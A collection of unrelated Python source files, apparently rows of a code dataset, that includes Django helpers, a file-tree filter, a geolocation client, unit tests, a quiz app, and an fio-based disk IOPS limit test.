"fancy",
"fangs",
"fantasy",
"fatal",
"fatigue",
"favorite",
"fawn",
"fiber",
"fiction",
"filter",
"finance",
"findings",
"finger",
"firefly",
"firm",
"fiscal",
"fishing",
"fitness",
"flame",
"flash",
"flavor",
"flea",
"flexible",
"flip",
"float",
"floral",
"fluff",
"focus",
"forbid",
"force",
"forecast",
"forget",
"formal",
"fortune",
"forward",
"founder",
"fraction",
"fragment",
"frequent",
"freshman",
"friar",
"fridge",
"friendly",
"frost",
"froth",
"frozen",
"fumes",
"funding",
"furl",
"fused",
"galaxy",
"game",
"garbage",
"garden",
"garlic",
"gasoline",
"gather",
"general",
"genius",
"genre",
"genuine",
"geology",
"gesture",
"glad",
"glance",
"glasses",
"glen",
"glimpse",
"goat",
"golden",
"graduate",
"grant",
"grasp",
"gravity",
"gray",
"greatest",
"grief",
"grill",
"grin",
"grocery",
"gross",
"group",
"grownup",
"grumpy",
"guard",
"guest",
"guilt",
"guitar",
"gums",
"hairy",
"hamster",
"hand",
"hanger",
"harvest",
"have",
"havoc",
"hawk",
"hazard",
"headset",
"health",
"hearing",
"heat",
"helpful",
"herald",
"herd",
"hesitate",
"hobo",
"holiday",
"holy",
"home",
"hormone",
"hospital",
"hour",
"huge",
"human",
"humidity",
"hunting",
"husband",
"hush",
"husky",
"hybrid",
"idea",
"identify",
"idle",
"image",
"impact",
"imply",
"improve",
"impulse",
"include",
"income",
"increase",
"index",
"indicate",
"industry",
"infant",
"inform",
"inherit",
"injury",
"inmate",
"insect",
"inside",
"install",
"intend",
"intimate",
"invasion",
"involve",
"iris",
"island",
"isolate",
"item",
"ivory",
"jacket",
"jerky",
"jewelry",
"join",
"judicial",
"juice",
"jump",
"junction",
"junior",
"junk",
"jury",
"justice",
"kernel",
"keyboard",
"kidney",
"kind",
"kitchen",
"knife",
"knit",
"laden",
"ladle",
"ladybug",
"lair",
"lamp",
"language",
"large",
"laser",
"laundry",
"lawsuit",
"leader",
"leaf",
"learn",
"leaves",
"lecture",
"legal",
"legend",
"legs",
"lend",
"length",
"level",
"liberty",
"library",
"license",
"lift",
"likely",
"lilac",
"lily",
"lips",
"liquid",
"listen",
"literary",
"living",
"lizard",
"loan",
"lobe",
"location",
"losing",
"loud",
"loyalty",
"luck",
"lunar",
"lunch",
"lungs",
"luxury",
"lying",
"lyrics",
"machine",
"magazine",
"maiden",
"mailman",
"main",
"makeup",
"making",
"mama",
"manager",
"mandate",
"mansion",
"manual",
"marathon",
"march",
"market",
"marvel",
"mason",
"material",
"math",
"maximum",
"mayor",
"meaning",
"medal",
"medical",
"member",
"memory",
"mental",
"merchant",
"merit",
"method",
"metric",
"midst",
"mild",
"military",
"mineral",
"minister",
"miracle",
"mixed",
"mixture",
"mobile",
"modern",
"modify",
"moisture",
"moment",
"morning",
"mortgage",
"mother",
"mountain",
"mouse",
"move",
"much",
"mule",
"multiple",
"muscle",
"museum",
"music",
"mustang",
"nail",
"national",
"necklace",
"negative",
"nervous",
"network",
"news",
"nuclear",
"numb",
"numerous",
"nylon",
"oasis",
"obesity",
"object",
"observe",
"obtain",
"ocean",
"often",
"olympic",
"omit",
"oral",
"orange",
"orbit",
"order",
"ordinary",
"organize",
"ounce",
"oven",
"overall",
"owner",
"paces",
"pacific",
"package",
"paid",
"painting",
"pajamas",
"pancake",
"pants",
"papa",
"paper",
"parcel",
"parking",
"party",
"patent",
"patrol",
"payment",
"payroll",
"peaceful",
"peanut",
"peasant",
"pecan",
"penalty",
"pencil",
"percent",
"perfect",
"permit",
"petition",
"phantom",
"pharmacy",
"photo",
"phrase",
"physics",
"pickup",
"picture",
"piece",
"pile",
"pink",
"pipeline",
"pistol",
"pitch",
"plains",
"plan",
"plastic",
"platform",
"playoff",
"pleasure",
"plot",
"plunge",
"practice",
"prayer",
"preach",
"predator",
"pregnant",
"premium",
"prepare",
"presence",
"prevent",
"priest",
"primary",
"priority",
"prisoner",
"privacy",
"prize",
"problem",
"process",
"profile",
"program",
"promise",
"prospect",
"provide",
"prune",
"public",
"pulse",
"pumps",
"punish",
"puny",
"pupal",
"purchase",
"purple",
"python",
"quantity",
"quarter",
"quick",
"quiet",
"race",
"racism",
"radar",
"railroad",
"rainbow",
"raisin",
"random",
"ranked",
"rapids",
"raspy",
"reaction",
"realize",
"rebound",
"rebuild",
"recall",
"receiver",
"recover",
"regret",
"regular",
"reject",
"relate",
"remember",
"remind",
"remove",
"render",
"repair",
"repeat",
"replace",
"require",
"rescue",
"research",
"resident",
"response",
"result",
"retailer",
"retreat",
"reunion",
"revenue",
"review",
"reward",
"rhyme",
"rhythm",
"rich",
"rival",
"river",
"robin",
"rocky",
"romantic",
"romp",
"roster",
"round",
"royal",
"ruin",
"ruler",
"rumor",
"sack",
"safari",
"salary",
"salon",
"salt",
"satisfy",
"satoshi",
"saver",
"says",
"scandal",
"scared",
"scatter",
"scene",
"scholar",
"science",
"scout",
"scramble",
"screw",
"script",
"scroll",
"seafood",
"season",
"secret",
"security",
"segment",
"senior",
"shadow",
"shaft",
"shame",
"shaped",
"sharp",
"shelter",
"sheriff",
"short",
"should",
"shrimp",
"sidewalk",
"silent",
"silver",
"similar",
"simple",
"single",
"sister",
"skin",
"skunk",
"slap",
"slavery",
"sled",
"slice",
"slim",
"slow",
"slush",
"smart",
"smear",
"smell",
"smirk",
"smith",
"smoking",
"smug",
"snake",
"snapshot",
"sniff",
"society",
"software",
"soldier",
"solution",
"soul",
"source",
"space",
"spark",
"speak",
"species",
"spelling",
"spend",
"spew",
"spider",
"spill",
"spine",
"spirit",
"spit",
"spray",
"sprinkle",
"square",
"squeeze",
"stadium",
"staff",
"standard",
"starting",
"station",
"stay",
"steady",
"step",
"stick",
"stilt",
"story",
"strategy",
"strike",
"style",
"subject",
"submit",
"sugar",
"suitable",
"sunlight",
"superior",
"surface",
"surprise",
"survive",
"sweater",
"swimming",
"swing",
"switch",
"symbolic",
"sympathy",
"syndrome",
"system",
"tackle",
"tactics",
"tadpole",
"talent",
"task",
"taste",
"taught",
"taxi",
"teacher",
"teammate",
"teaspoon",
"temple",
"tenant",
"tendency",
"tension",
"terminal",
"testify",
"texture",
"thank",
"that",
"theater",
"theory",
"therapy",
"thorn",
"threaten",
"thumb",
"thunder",
"ticket",
"tidy",
"timber",
"timely",
"ting",
"tofu",
"together",
"tolerate",
"total",
"toxic",
"tracks",
"traffic",
"training",
"transfer",
"trash",
"traveler",
"treat",
"trend",
"trial",
"tricycle",
"trip",
"triumph",
"trouble",
"true",
"trust",
"twice",
"twin",
"type",
"typical",
"ugly",
"ultimate",
"umbrella",
"uncover",
"undergo",
"unfair",
"unfold",
"unhappy",
"union",
"universe",
"unkind",
"unknown",
"unusual",
"unwrap",
"upgrade",
"upstairs",
"username",
"usher",
"usual",
"valid",
"valuable",
"vampire",
"vanish",
"various",
"vegan",
"velvet",
"venture",
"verdict",
"verify",
"very",
"veteran",
"vexed",
"victim",
"video",
"view",
"vintage",
"violence",
"viral",
"visitor",
"visual",
"vitamins",
"vocal",
"voice",
"volume",
"voter",
"voting",
"walnut",
"warmth",
"warn",
"watch",
"wavy",
"wealthy",
"weapon",
"webcam",
"welcome",
"welfare",
"western",
"width",
"wildlife",
"window",
"wine",
"wireless",
"wisdom",
"withdraw",
"wits",
"wolf",
"woman",
"work",
"worthy",
"wrap",
"wrist",
"writing",
"wrote",
"year",
"yelp",
"yield",
"yoga",
"zero",
]
|
from django import forms
from django.conf import settings
from django.core.files.storage import default_storage as storage
import commonware.log
from tower import ugettext as _
from mkt.site.utils import slug_validator
from .models import BlockedSlug, Webapp
log = commonware.log.getLogger('z.addons')
def clean_slug(slug, instance):
slug_validator(slug, lower=False)
slug_field = 'app_slug'
if slug != getattr(instance, slug_field):
if Webapp.objects.filter(**{slug_field: slug}).exists():
raise forms.ValidationError(
_('This slug is already in use. Please choose another.'))
if BlockedSlug.blocked(slug):
raise forms.ValidationError(
_('The slug cannot be "%s". Please choose another.' % slug))
return slug
def icons():
"""
Generates a list of tuples for the default icons for add-ons,
in the format (psuedo-mime-type, description).
"""
icons = [('image/jpeg', 'jpeg'), ('image/png', 'png'), ('', 'default')]
dirs, files = storage.listdir(settings.ADDON_ICONS_DEFAULT_PATH)
for fname in files:
if '32' in fname and 'default' not in fname:
icon_name = fname.split('-')[0]
icons.append(('icon/%s' % icon_name, icon_name))
return icons
|
import glob
from fnmatch import fnmatch
from functools import cached_property
from os import path
from typing import List
class FileTreeNode(object):
"""
本类用于识别Python文件结构。
获取文件树,并排除用户指定过滤的部分。
关于文件结构的过滤功能都写在了这个文件夹里,包括以下内容:
#. 对于非 ``python package`` 的部分全部跳过;
#. 跳过由 ``.`` 和 ``_`` 开头的文件和文件夹,不过保留 ``__*__`` 格式的文件和文件夹;
#. 跳过 ``__pycache__`` 文件夹;
#. 跳过用户指定要排除的文件夹。
"""
SUFFIXES = ('.py', '.pyx', '.pyw')
CORE_NAME = '__init__'
def __init__(self, directory: str, exclude: List[str]):
"""
根据指定的模式对文件夹进行解析,其递归的结果就是文件树。
将文件夹分为以下内容:
================ =================================== ======================
类别 标准 以Python为例的解释
================ =================================== ======================
核心文件 后缀名为 ``.suffix`` 的文件 Python模块
非核心文件 后缀名不为 ``.suffix`` 的文件 其他文件
核心文件夹 包含 ``core.suffix`` 的文件夹 Python包
非核心文件夹 不包含 ``core.suffix`` 的文件夹 其他文件夹
================ =================================== ======================
这四部分将分别采用不同的方式进行处理。
有一些额外的点需要说明,(这里仅以python文件结构为例):
#. __init__.py 将不会显示在核心文件和非核心文件中;
Args:
directory: 需要计算文件树的文件夹。
exclude: 需要排除的模式,采用标准库的fnmatch进行匹配。
Returns:
整理后的文件树
"""
self.directory = path.abspath(directory)
self.exclude_patterns = exclude
@cached_property
def filtered_sub_paths(self):
"""定义基本的基于用户的 ``exclude`` 参数的过滤器"""
result = glob.glob(path.join(self.directory, '*'))
for file_path in result.copy(): # 这里要采用复制,因为遍历过程的原位删除会改变其遍历过程
# 删去用户指定排除的文件和文件夹
if any(fnmatch(file_path, pattern) for pattern in self.exclude_patterns):
result.remove(file_path)
continue
# 由于其他的路径都是从这里导出的,在这里进行一次排序,别的位置就不需要排序了
return sorted(result)
@cached_property
def sub_files(self) -> List[str]:
"""子文件的路径列表,包括核心文件、其他文件及索引文件。"""
return [child for child in self.filtered_sub_paths if path.isfile(child)]
@cached_property
def sub_core_files(self) -> List[str]:
"""核心子文件的路径列表。"""
# 判断后缀是否是核心文件的后缀
result = [file for file in self.sub_files if path.splitext(file)[1] in self.SUFFIXES]
# 判断基本名是否不是基本名
result = [p for p in result if path.splitext(path.split(p)[1])[0] != self.CORE_NAME]
return result
@cached_property
def sub_other_files(self):
# 判断后缀是否是核心文件的后缀
result = [file for file in self.sub_files if path.splitext(file)[1] not in self.SUFFIXES]
# 判断基本名是否不是基本名
result = [p for p in result if path.splitext(path.split(p)[1])[0] != self.CORE_NAME]
return result
@cached_property
def sub_directories(self) -> List['FileTreeNode']:
"""子文件夹,包括核心文件夹和其他文件夹"""
return [FileTreeNode(child, self.exclude_patterns) for child in self.filtered_sub_paths if path.isdir(child)]
@cached_property
def sub_core_directories(self) -> List['FileTreeNode']:
"""子包"""
result = [node for node in self.sub_directories if node.is_core_directory]
return result
@cached_property
def sub_other_directories(self) -> List['FileTreeNode']:
"""其他文件夹"""
return [d for d in self.sub_directories if not d.is_core_directory]
@cached_property
def is_core_directory(self) -> bool:
"""是否是核心包"""
# 取删去文件夹后的基本名
sub_files = [path.split(file)[1] for file in self.sub_files]
# 判断是否包含索引文件
for suffix in self.SUFFIXES:
if f'{self.CORE_NAME}{suffix}' in sub_files:
return True
return False
class PythonFileTreeNode(FileTreeNode):
@cached_property
def filtered_sub_paths(self):
"""定义针对Python的过滤器"""
result = super(PythonFileTreeNode, self).filtered_sub_paths.copy()
for file_path in result.copy(): # 这里要采用复制,因为遍历过程的原位删除会改变其遍历过程
dir_name, file_name = path.split(file_path)
base_name, ext_name = path.splitext(file_name)
# 删去由 ``.`` 和 ``_`` 开头的文件和文件夹,不过对于 ``__*__`` 格式的不进行操作
if base_name.startswith(('.', '_')) and not (base_name.startswith('__') and base_name.endswith('__')):
result.remove(file_path)
continue
# 删去 ``__pycache__`` 文件夹
if path.isdir(file_path) and base_name == '__pycache__':
result.remove(file_path)
continue
return result
class RstFileTreeNode(FileTreeNode):
"""
针对 `.rst` 文件结构的过滤器,用于对生成后的文档结构进行识别。
主要是用于增量更新的过程中,需要判断哪些文件是无用的需要删除的。
本类实现了对 ``.rst`` 文件结构的过滤,可以用于配合 ``PythonFileTreeNode`` 找出这些需要被删除的文件。
这个类暂时没有派上用场。
"""
SUFFIXES = ('.md', '.rst')
CORE_NAME = 'index' |
def make_full_name(given_name, family_name):
"""Return a string in this form "family_name; given_name".
For example, if this function were called like this:
make_full_name("Sally", "Brown"), it would return "Brown; Sally".
"""
full_name = f"{family_name};{given_name}"
return full_name
def extract_family_name(full_name):
"""Extract and return the family name from a
string in this form "family_name; given_name".
For example, if this function were called like this:
extract_family_name("Brown; Sally"), it would return "Brown".
"""
# Find the index where "; " appears within the full name string.
semicolon_index = full_name.index("; ")
# Extract a substring from the full name and return it.
family_name = full_name[0 : semicolon_index]
return family_name
def extract_given_name(full_name):
"""Extract and return the given name from a
string in this form "family_name; given_name".
For example, if this function were called like this:
extract_given_name("Brown; Sally"), it would return "Sally".
"""
# Find the index where "; " appears within the full name string.
semicolon_index = full_name.index("; ")
# Extract a substring from the full name and return it.
given_name = full_name[semicolon_index + 2 : ]
return given_name
|
############################################################################
# Copyright 2015 Valerio Morsella #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
############################################################################
import os
import unittest
from galenpy.galen_api import Galen
from galenpy.galen_report import TestReport, info_node, warn_node, error_node
from galenpy.galen_webdriver import GalenRemoteWebDriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
class GalenTestBase(unittest.TestCase):
def __init__(self, methodName='runTest'):
super(GalenTestBase, self).__init__(methodName)
def setUp(self):
self.driver = GalenRemoteWebDriver("http://localhost:4444/wd/hub", desired_capabilities=DesiredCapabilities.CHROME)
def tearDown(self):
if self.driver:
self.driver.quit()
def check_layout(self, test_name, specs, included_tags, excluded_tags):
try:
parent_dir = os.path.abspath(os.path.join(os.path.dirname(__file__) + '/..'))
test_report = TestReport(test_name)
check_layout_report = Galen().check_layout(self.driver, os.path.join(parent_dir, "test", "specs", specs),
included_tags, excluded_tags)
test_report.add_report_node(info_node("Running layout check for: " + test_name)
.with_node(warn_node('this is just an example'))
.with_node(error_node('to demonstrate reporting'))) \
.add_layout_report_node("check " + specs, check_layout_report).finalize()
if check_layout_report.errors > 0:
raise AssertionError(
"Incorrect layout: " + test_name + " - Number of errors " + str(check_layout_report.errors))
except Exception as e:
raise e
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
import urllib
import urllib2
from django.utils.translation import ugettext_lazy as _
from geopy import Nominatim
from geopy.exc import GeocoderTimedOut
class GeoLocator(object):
base_address_url = 'http://www.mapquestapi.com/geocoding/v1/address'
base_route_url = 'http://www.mapquestapi.com/directions/v2/route'
home_address = 'Am Quellenberg A 1a, Dürrröhrsdorf-Dittersbach'
def get_location_coordinates(self, key, address):
# use mapquest
address = self._escape_address(address)
quoted_address = urllib.quote(address)
url = self.base_address_url + '?key={0}&location={1}'.format(key, quoted_address)
response = urllib2.urlopen(url)
result = json.load(response)
try:
loc = result['results'][0]['locations'][0]
return {
'lat': loc['latLng']['lat'],
'long': loc['latLng']['lng'],
}
except Exception:
pass
# if no location was found use nominatim
geolocator = Nominatim(
format_string="%s, Landkreis Sächsische Schweiz-Osterzgebirge, Sachsen, 01833, Deutschland")
try:
locations = geolocator.geocode(address, False)
except GeocoderTimedOut:
locations = None
if locations:
location = locations[0]
return {
'lat': float(location.latitude),
'long': float(location.longitude),
# 'address': location.address,
# 'raw': location.raw,
}
return {}
def get_route(self, key, to_address, from_address=None):
home = from_address if from_address else self.home_address
home = self._escape_address(home)
to_address = self._escape_address(to_address)
quoted_address = urllib.quote(to_address)
quoted_home = urllib.quote(home)
url_route = self.base_route_url + '?key={0}&from={1}&to={2}&locale=de_DE&unit=k'.format(
key, quoted_home, quoted_address)
response = urllib2.urlopen(url_route)
result = json.load(response)
try:
route = result['route']
dist = route['distance']
minutes, seconds = divmod(route['time'], 60)
return {
'distance': _('{0} km').format(round(dist, 3)),
'time': _('{0} min {1} s').format(minutes, seconds),
}
except Exception:
pass
return {}
def _escape_address(self, address):
character_mapping = {
0xe4: u'ae',
ord(u'ö'): u'oe',
ord(u'ü'): u'ue',
ord(u'ß'): u'ss',
}
return address.translate(character_mapping)
|
import json
from src.domain.text.caption import Caption
from src.domain.text.emphasis import Emphasis
from src.domain.text.properties import Properties
def test_caption_initializes():
caption = Caption(1, "start", "end", "test text", None)
assert caption.index == 1
assert caption.start == "start"
assert caption.end == "end"
assert caption.text == "test text"
def test_load_from_json():
with open("../../../data/caption.emphasis.v3.json") as f:
data = json.load(f)
caption_data = data['captions'][1]
properties = Properties([Emphasis.from_dict(emph)for emph in caption_data["properties"]["emphasis"]])
caption = Caption.from_dict(caption_data)
assert caption.index == 2
assert caption.start == "00:00:08,720"
assert caption.end == "00:00:14,480"
assert caption.text == "The spike around 1000 calories represents standard burrito orders"
assert caption.properties == properties
|
'''题库的核心解释模块'''
import sys
import objects
import datetime #datetime.datetime.now().strftime("%Y/%m/%d %H:%M:%S")
from configuration import *
import os
from random import shuffle
class Application():
'''复习软件'''
def __init__(self):
# 题库文件
self.Qlibrary = {} # 题库{章节A:list(题目对象),章节B:...}
self.Qerror = [] # 错题集
self.Qfavorites = [] # 收藏的问题(蒙对了之类的)
# 用户信息
self.user = "Frozen"
# 应用状态
self.running = True
def __del__(self):
print("Goodbye {} !".format(self.user))
def init(self):
'''初始化应用'''
print("当前模式",APP_MODE)
self.load()# 载入文件并生成题库
if APP_MODE == "DEBUG":
print("正在进行题库完整性检验")
self.check_library()
def start(self):
'''启动应用'''
self.init()#初始化
#用户登录(未做)
while self.running:#应用主循环
self.menu()
self.exit()
def exit(self):
'''退出应用'''
if APP_OPT_SAVE_AUTO:
self.save()
print("已自动导出当前的错题和收藏")
def menu(self):
'''菜单'''
print("\n{}\n".format(datetime.datetime.now().strftime("%Y/%m/%d %H:%M:%S")))
print(APP_TITILE)
print("1.正序单元测验")
print("2.乱序单元测验")
print("3.乱序全库测验")
print("A.导出错题+收藏(保存后会清空内存记录)")
print("Others:Exit")
op = self.user_input()
if op == '1':
self.test_unit()
elif op == '2':
self.test_unit(_random=True)
elif op == '3':
self.test_random()
elif op == 'A':
self.save()
else: self.running = False
def save(self):
'''分别保存错题集和收藏,时间有限不检测异常了'''
T = datetime.datetime.now().strftime("%Y-%m-%d_%H-%M")
if self.Qerror:#如果有错题
path_errors = './datas/ERRORS-' + T
fp_e = open(path_errors + '.txt','w')
fp_e.write(pattern.Chapter+'错题集-'+T+'\n')
if APP_OPT_SAVE_MARKDOWN:#如果需要额外生成Markdown格式
fp_e_m = open(path_errors + '.md','w')
fp_e_m.write('# 错题集-'+T+'\n')
for e in self.Qerror:
fp_e.write(e.info_original())
if APP_OPT_SAVE_MARKDOWN:
fp_e_m.write(e.info_markdown())
if APP_OPT_SAVE_MARKDOWN:fp_e_m.close()
print("错题保存在:{}".format(os.path.abspath('./datas')))
fp_e.close()
else:
print("当前没有错题")
if self.Qfavorites:#如果有收藏
path_favor = './datas/FAVOR-' + T
fp_f = open(path_favor + '.txt','w')
fp_f.write(pattern.Chapter+'收藏-'+T+'\n')
if APP_OPT_SAVE_MARKDOWN:#如果需要额外生成Markdown格式
fp_f_m = open(path_favor + '.md','w')
fp_f_m.write('# 收藏-'+T+'\n')
for f in self.Qfavorites:
fp_f.write(f.info_original())
if APP_OPT_SAVE_MARKDOWN:
fp_f_m.write(f.info_markdown())
if APP_OPT_SAVE_MARKDOWN:fp_f_m.close()
print("收藏题保存在:{}".format(os.path.abspath('./datas')))
fp_f.close()
else:
print("当前没有收藏题")
self.Qerror.clear()
self.Qfavorites.clear()
def test_unit(self,_random=False):
'''单元检测(通过修改参数可以乱序测试)'''
while True:
print("--------请选择测试单元序号--------")
cnt = ord('A')
for chapter,quetions in self.Qlibrary.items():
print("({}):{}题目数量:{}".format(chr(cnt),chapter,len(quetions)))
cnt += 1
print("[Others:Exit]")
op = self.user_input().upper()
if op: op=op[0]
if not 'A'<=op<chr(cnt):
print(">>[退出或序号超出范围]")
break
else:
op = ord(op)-ord('A')
cnt = 0
for chapter,quetions in self.Qlibrary.items():
if cnt == op:
qsum = len(quetions)
asum = 1
cnt_right = 0
questionS = quetions[:]
if _random : shuffle(questionS)
for q in questionS:
ratio_right = 0.0
if asum > 1:
ratio_right = cnt_right*100/(asum-1)
print("\n测试进度:{}/{} [{:.1f}%] 当前正确率:{}/{} [{:.1f}%]\n".
format(asum,qsum,asum*100/qsum,cnt_right,asum-1,ratio_right))
right = q.test()
if right: cnt_right += 1#统计正确率
else:
self.Qerror.append(q)#将错题加入错题集
asum += 1
#数据统计
#Haimeizuo
ans = input(prompt.NEXT).strip()
if ans == 'e':
return
elif ans == 's':
self.Qfavorites.append(q) #加入收藏夹
break
cnt += 1
def test_random(self):
'''乱序检测'''
questions = []
for qlist in self.Qlibrary.values():
for q in qlist:
questions.append(q)
shuffle(questions)
qsum = len(questions)
asum = 1
cnt_right = 0
for q in questions:
ratio_right = 0.0
if asum > 1:
ratio_right = cnt_right*100/(asum-1)
print("\n测试进度:{}/{} [{:.1f}%] 当前正确率:{}/{} [{:.1f}%]\n".
format(asum,qsum,asum*100/qsum,cnt_right,asum-1,ratio_right))
right = q.test()
if right: cnt_right += 1#统计正确率
else:
self.Qerror.append(q)#将错题加入错题集
asum += 1
#数据统计
#Haimeizuo
ans = input(prompt.NEXT).strip()
if ans == 'e':
return
elif ans == 's':
self.Qfavorites.append(q) #加入收藏夹
def user_input(self):
return input("[{}]>>".format(self.user)).strip()
def load(self):
'''读入题库文件'''
with open(FILE_PATH,'r',encoding=FILE_CODER) as fp:
if not fp:
print("{}:题库文件加载失败".format(__class__))
sys.exit(-1)
content = fp.readlines()
self.parser(content)#对内容解析,生成Qlibrary
def parser(self,content):
'''根据configuration配置,解析题库文件'''
chapter = ""#当前章节
question = ""
options = ""
answer = ""
currentType = None#当前处理的数据类型,应为是readlines所以可能面临不匹配的情况
for line in content:
if line.isspace(): continue
#print(type(line))#是str类型
category = pattern.match(line)
if category == 'C':#新的章节
currentType = category
chapter = line
self.Qlibrary[chapter]=[] #初始化该章节
elif category =='Q':#新的问题
currentType = category
if question:#如果不是第一个问题则加载到题库
self.Qlibrary[chapter].append(objects.Problem(question,options,answer))
question = line#初始化一个新问题
options = ""
answer = ""
elif category == 'O':#刚到选项
currentType = category
options += line #选项可能多行同时匹配,所用默认拼接
elif category == 'A':#刚到答案
currentType = category
answer = line
else:#无匹配的类型
if not currentType:
print("{}:未知的数据类型,请检查文件和匹配规则".format(__class__))
sys.exit(-1)
if currentType == 'C':
chapter+=line
elif currentType == 'Q':
question+=line
elif currentType == 'O':
options+=line
elif currentType == 'A':
answer+=line
def show_library(self):
'''输出题库(测试用)'''
for chapter,questions in self.Qlibrary.items():
print("{}".format(chapter))
for q in questions:
q.show()
def check_library(self):
'''检测题库题目完整性'''
for chapter,questions in self.Qlibrary.items():
num = 1
for q in questions:
res = q.check()
if res:
print("{}{}:\n{}".format(chapter,num,res))
num+=1
APP = Application() #singleton
if __name__ == "__main__":
APP.init() |
def init_actions_(service, args):
"""
this needs to returns an array of actions representing the depencies between actions.
Looks at ACTION_DEPS in this module for an example of what is expected
"""
return {
'test': ['install']
}
def test(job):
import sys
try:
log = j.logger.get('test')
log.addHandler(j.logger._LoggerFactory__fileRotateHandler('tests'))
log.info('Test started')
service = job.service
vm_os = service.producers.get('os')[0]
vm_exe = vm_os.executor.prefab
log.info('Install fio')
vm_exe.core.run('apt-get update')
vm_exe.core.run('echo "Y" | apt-get install fio')
log.info('Run fio on vdb, iops should be less than maxIOPS')
vm = service.producers['node'][0]
disk = vm.producers['disk'][0]
maxIOPS = disk.model.data.maxIOPS
readBytesSec = disk.model.data.readBytesSec
writeBytesSec = disk.model.data.writeBytesSec
fio_cmd = "fio --ioengine=libaio --group_reporting --filename=/dev/{1} "\
"--runtime=30 --readwrite=randrw --size=500M --name=test{0} "\
"--output={0}".format('b1', 'vdb')
vm_exe.core.run(fio_cmd)
outIops = vm_exe.core.run("cat %s | grep -o 'iops=[0-9]\{1,\}' | cut -d '=' -f 2" % 'b1')
listIops = outIops[1].split('\n')
outBytes = vm_exe.core.run("cat %s | grep -o 'bw=[0-9]\{1,\}\.[0-9]\{1,\}' | cut -d '=' -f 2" % 'b1')
listBytes = outBytes[1].split('\n')
int_listIops = [int(i) for i in listIops if int(i) > maxIOPS]
float_listBytes = [float(i) * 1000 for i in listBytes]
iops = len(int_listIops)
if iops != 0 or float_listBytes[0] > readBytesSec or float_listBytes[1] > writeBytesSec:
service.model.data.result = 'FAILED : {} {}'.format('test_limit_iops: disk limit not properly set')
service.save()
return
log.info('Create another data disk (vdc) and set max_iops to 1000')
vdc = vm.producers['vdc'][0]
g8client = vdc.producers["g8client"][0]
config_instance = "{}_{}".format(g8client.aysrepo.name, g8client.model.data.instance)
client = j.clients.openvcloud.get(instance=config_instance, create=False, die=True, sshkey_path="/root/.ssh/ays_repos_key")
acc = client.account_get(vdc.model.data.account)
space = acc.space_get(vdc.model.dbobj.name, vdc.model.data.location)
machine = space.machines[vm.name]
disk_id = machine.add_disk(name='disk_c', description='test', size=50, type='D')
machine.disk_limit_io(disk_id, 0, 4000000, 4000000, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1000)
log.info('Run fio on vdc, iops should be less than 1000')
fio_cmd = "fio --ioengine=libaio --group_reporting --filename=/dev/{1} "\
"--runtime=30 --readwrite=randrw --size=500M --name=test{0} "\
"--output={0}".format('c1', 'vdc')
vm_exe.core.run(fio_cmd)
outIops = vm_exe.core.run("cat %s | grep -o 'iops=[0-9]\{1,\}' | cut -d '=' -f 2" % 'c1')
listIops = outIops[1].split('\n')
outBytes = vm_exe.core.run("cat %s | grep -o 'bw=[0-9]\{1,\}\.[0-9]\{1,\}' | cut -d '=' -f 2" % 'c1')
listBytes = outBytes[1].split('\n')
int_listIops = [int(i) for i in listIops if int(i) > 1000]
float_listBytes = [float(i) * 1000 for i in listBytes]
iops = len(int_listIops)
if iops != 0 or float_listBytes[0] > 4000000 or float_listBytes[1] > 4000000:
service.model.data.result = 'FAILED : {} {}'.format('test_limit_iops: disk limit not properly set')
service.save()
return
log.info('Run fio on vdc, iops should be less than 500')
machine.disk_limit_io(disk_id, 0, 2000000, 2000000, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 500)
fio_cmd = "fio --ioengine=libaio --group_reporting --filename=/dev/{1} "\
"--runtime=30 --readwrite=randrw --size=500M --name=test{0} "\
"--output={0}".format('c2', 'vdc')
vm_exe.core.run(fio_cmd)
outIops = vm_exe.core.run("cat %s | grep -o 'iops=[0-9]\{1,\}' | cut -d '=' -f 2" % 'c2')
listIops = outIops[1].split('\n')
outBytes = vm_exe.core.run("cat %s | grep -o 'bw=[0-9]\{1,\}\.[0-9]\{1,\}' | cut -d '=' -f 2" % 'c2')
listBytes = outBytes[1].split('\n')
int_listIops = [int(i) for i in listIops if int(i) > 500]
float_listBytes = [float(i) * 1000 for i in listBytes]
iops = len(int_listIops)
if iops != 0 or float_listBytes[0] > 2000000 or float_listBytes[1] > 2000000:
service.model.data.result = 'FAILED : {} {}'.format('test_limit_iops: disk limit not properly set')
service.save()
return
service.model.data.result = 'OK : {} '.format('test_limit_iops')
except:
service.model.data.result = 'ERROR : {} {}'.format('test_limit_iops', str(sys.exc_info()[:2]))
log.info('Test Ended')
service.save()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.